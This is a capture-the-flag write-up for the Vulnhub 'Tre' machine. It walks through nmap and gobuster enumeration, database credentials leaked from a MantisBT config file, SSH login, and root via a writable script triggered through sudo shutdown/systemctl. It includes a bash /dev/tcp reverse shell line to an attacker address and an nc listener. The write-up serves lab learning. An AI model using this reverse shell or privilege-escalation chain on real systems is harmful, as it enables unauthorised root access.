Vulnhub - Tre Writeup

Hi all, this one was a tricky one. Let’s pwn it!

You can find the machine there > Tre

Let’s start as always with a nmap scan.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$ ip=192.168.1.9
$ nmap -sC -sV -p- -oN nmap.txt $ip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-20 23:55 EEST
Nmap scan report for tre.zte.com.cn (192.168.1.9)
Host is up (0.0018s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 99:1a:ea:d7:d7:b3:48:80:9f:88:82:2a:14:eb:5f:0e (RSA)
|   256 f4:f6:9c:db:cf:d4:df:6a:91:0a:81:05:de:fa:8d:f8 (ECDSA)
|_  256 ed:b9:a9:d7:2d:00:f8:1b:d3:99:d6:02:e5:ad:17:9f (ED25519)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Tre
8082/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Tre
MAC Address: 00:0C:29:7A:79:76 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Let’s start the enumeration with port 80, this time we will use the raft wordlist.

1
2
3
4
5
6
7
8
$ gobuster dir -q -u http://$ip/ -w ~/Documents/wordlists/SecLists/Discovery/Web-Content/raft-large-directories.txt -x php,html,txt -o gobuster.txt
/cms (Status: 301)
/system (Status: 401)
/info.php (Status: 200)
/index.html (Status: 200)
/server-status (Status: 403)
/mantisbt (Status: 301) <-----
/adminer.php (Status: 200)

/mantisbt seems interesting, let’s run gobuster on it.

1
2
3
4
5
6
7
8
9
10
$ gobuster dir -q -u http://$ip/mantisbt/ -w ~/Documents/wordlists/SecLists/Discovery/Web-Content/raft-large-directories.txt -x php,html,txt -o gobuster.txt
/admin (Status: 301)
/js (Status: 301)
/images (Status: 301)
/scripts (Status: 301)
/plugins (Status: 301)
/css (Status: 301)
/search.php (Status: 302)
/api (Status: 301)
/config (Status: 301) <---

/config sounds interesting, let’s dig into it. When we visit /config we can see this .txt file :

This .txt file has some database configuration data.

1
2
3
4
5
6
# --- Database Configuration ---
$g_hostname      = 'localhost';
$g_db_username   = 'mantissuser';
$g_db_password   = 'password@123AS';
$g_database_name = 'mantis';
$g_db_type       = 'mysqli';

We can use them on /adminer.php

After we can see there the mantis_user_table, this table has some creds in that we can use them on ssh.

And we’re in!

1
2
3
$ ssh tre@$ip
tre@192.168.1.9's password: 
tre@tre:~$ 

Now privesc, its a bit tricky! Took me a while to figure it out.

If we check sudo -l, we can see this :

1
2
3
4
5
6
tre@tre:~$ sudo -l
Matching Defaults entries for tre on tre:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User tre may run the following commands on tre:
    (ALL) NOPASSWD: /sbin/shutdown

We can run /sbin/shutdown as root, hm.. shutdown system binary shutdowns the system like poweroff useless right ?

If we run file on it we can see this :

1
2
tre@tre:~$ file /sbin/shutdown
/sbin/shutdown: symbolic link to /bin/systemctl

shutdown has symlink to systemctl :

1
2
tre@tre:~$ ls -la /sbin/shutdown
lrwxrwxrwx 1 root root 14 Apr 27 13:02 /sbin/shutdown -> /bin/systemctl

With systemctl we can start/stop/restart a service!

1
sudo systemctl start apache2.service

If we run now pspy we can see this :

1
2
3
4
tre@tre:/tmp$ chmod +x pspy64
tre@tre:/tmp$ ./pspy64 -p -i 1000
...
2020/05/20 17:38:21 CMD: UID=0    PID=3609   | /bin/bash /usr/bin/check-system

Every 1 second this file executed as root & we can edit! The content of this file :

1
2
3
4
5
6
7
8
9
tre@tre:/tmp$ cat /usr/bin/check-system
DATE=`date '+%Y-%m-%d %H:%M:%S'`
echo "Service started at ${DATE}" | systemd-cat -p info

while :
do
echo "Checking...";
sleep 1;
done

This file checking when service started, we can add our reverse shell in & when we execute /sbin/shutdown this will execute /bin/systemctl and we will start the service so we will get a root shell!

1
2
3
4
5
6
7
8
9
DATE=`date '+%Y-%m-%d %H:%M:%S'`
echo "Service started at ${DATE}" | systemd-cat -p info

while :
do
bash -i >& /dev/tcp/192.168.1.13/5555 0>&1
echo "Checking...";
sleep 1;
done

Let’s execute it now!

1
2
3
tre@tre:/tmp$ sudo /sbin/shutdown now
tre@tre:/tmp$ Connection to 192.168.1.9 closed by remote host.
Connection to 192.168.1.9 closed.

Before you boot the machine again open a nc listener.

And we have root shell!

1
2
3
4
5
6
$ nc -lvp 5555
listening on [any] 5555 ...
root@tre:/# cat /root/root.txt
cat /root/root.txt
{SunCSR_Tr3_Viet_Nam_2020}
root@tre:/# 

What a box :), See you!